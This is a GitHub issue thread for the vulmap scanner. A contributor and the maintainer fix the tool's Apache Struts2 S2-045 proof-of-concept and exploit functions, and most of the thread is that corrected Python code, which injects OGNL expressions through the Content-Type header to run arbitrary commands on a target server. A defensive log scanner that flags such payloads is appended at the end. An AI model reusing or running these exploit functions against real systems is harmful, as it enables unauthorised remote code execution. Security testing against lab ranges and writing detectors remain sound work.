zhzyker / vulmap

Vulmap is a web vulnerability scanning and verification tool: it scans webapps for vulnerabilities and can also verify (exploit) the findings.

Home Page: https://github.com/zhzyker/vulmap


ApacheStruts2.py: the S2-045 PoC has a bug

shadow1ng opened this issue · comments

        self.headers2 = {
            'User-Agent': self.ua,
            'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
        }
        try:
            # The response is stored in self.req but read back from self.request below
            self.req = requests.get(self.url, headers=self.headers1, timeout=self.timeout, verify=False)
            if r"54289" in self.request.headers['FUCK']:

self.req should be self.request

s2_045_exp also has a problem.
s2_046_exp works fine.
I changed s2_045_exp slightly to follow the format of s2_046_exp, and it works now:

        self.headers2 = {
            'User-Agent': self.ua,
            'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
        }
        try:
            self.req = requests.get(self.url, headers=self.headers2, timeout=self.timeout, verify=False)
            self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
            verify.exploit_print(self.req.text, self.raw_data)

Thanks to @shadow1ng for the correction.
Indeed both the poc and the exp had problems.
The poc has been fixed to:

    def s2_045_poc(self):
        self.threadLock.acquire()
        md = random_md5()
        cmd = "echo " + md
        headers_1 = {
            'User-Agent': self.ua,
            'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
        }
        headers_2 = {
            'User-Agent': self.ua,
            'Content-Type': '${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].'
                            'addHeader("FUCK",233*233)}.multipart/form-data'
        }
        try:
            self.request = requests.post(self.url, headers=headers_1, timeout=self.timeout, verify=False)
            if md in misinformation(self.request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = self.payload_s2_045.replace("RECOMMAND", cmd)
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            else:
                self.request = requests.post(self.url, headers=headers_2, timeout=self.timeout, verify=False)
                if r"54289" in self.request.headers['FUCK']:
                    self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["vul_payd"] = '${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("FUCK",233*233)}.multipart/form-data'
                    self.vul_info["prt_info"] = "[rce] [cmd: 233*233]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

The exp has been fixed to:

    def s2_045_exp(self, cmd):
        vul_name = "Apache Struts2: S2-045"
        headers = {
            'User-Agent': self.ua,
            'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
        }
        try:
            self.req = requests.post(self.url, headers=headers, timeout=self.timeout, verify=False)
            self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
            verify.exploit_print(self.req.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception as e:
            verify.error_print(vul_name)

Currently, using the vulhub range as the test target, both work.

Your fscan is excellent, I really like it.
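The PoC in this thread probes S2-045 by placing an OGNL expression in the Content-Type header. As an added defensive example (not part of vulmap or this issue), the following scans constructed access-log lines that record the request Content-Type and flags values that look like such probes; the log format, the hint strings and the sample lines are assumptions made for the example.

```python
import re

# Constructed sample access-log lines (NCSA-style with the request
# Content-Type appended as the last quoted field); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Feb/2021:14:48:01 +0800] "POST /index.action HTTP/1.1" 200 "multipart/form-data; boundary=----abc"
10.0.0.7 - - [26/Feb/2021:14:48:02 +0800] "POST /index.action HTTP/1.1" 200 "${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("FUCK",233*233)}.multipart/form-data"
10.0.0.9 - - [26/Feb/2021:14:48:03 +0800] "GET /login HTTP/1.1" 200 "application/json"
10.0.0.7 - - [26/Feb/2021:14:48:05 +0800] "POST /index.action HTTP/1.1" 200 "%{233*233}.multipart/form-data"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) "(?P<ctype>.*)"$')

# A legitimate Content-Type is a media type plus optional parameters; an OGNL
# expression opener ("%{" or "${") or Struts/XWork internals never belong there.
OGNL_OPENER = re.compile(r'[%$]\{')
OGNL_HINTS = ("#context", "xwork2", "HttpServletResponse", "addHeader(")


def classify_content_type(ctype: str) -> list:
    """Return the reasons a Content-Type value looks like an S2-045 probe."""
    reasons = []
    if OGNL_OPENER.search(ctype):
        reasons.append("ognl-expression-opener")
    reasons += [f"hint:{h}" for h in OGNL_HINTS if h in ctype]
    # S2-045 probes keep the literal multipart media type somewhere in the value
    # so the vulnerable multipart parser handles the request; a media type that
    # does not start the value is itself anomalous.
    if "multipart/form-data" in ctype and not ctype.lstrip().startswith("multipart/form-data"):
        reasons.append("media-type-not-at-start")
    return reasons


def scan_log(text: str) -> list:
    """Parse log lines and return (ip, timestamp, request, reasons) for hits."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the scan
        reasons = classify_content_type(m["ctype"])
        if reasons:
            hits.append((m["ip"], m["ts"], m["req"], reasons))
    return hits


if __name__ == "__main__":
    for ip, ts, req, reasons in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {req!r}: {', '.join(reasons)}")
```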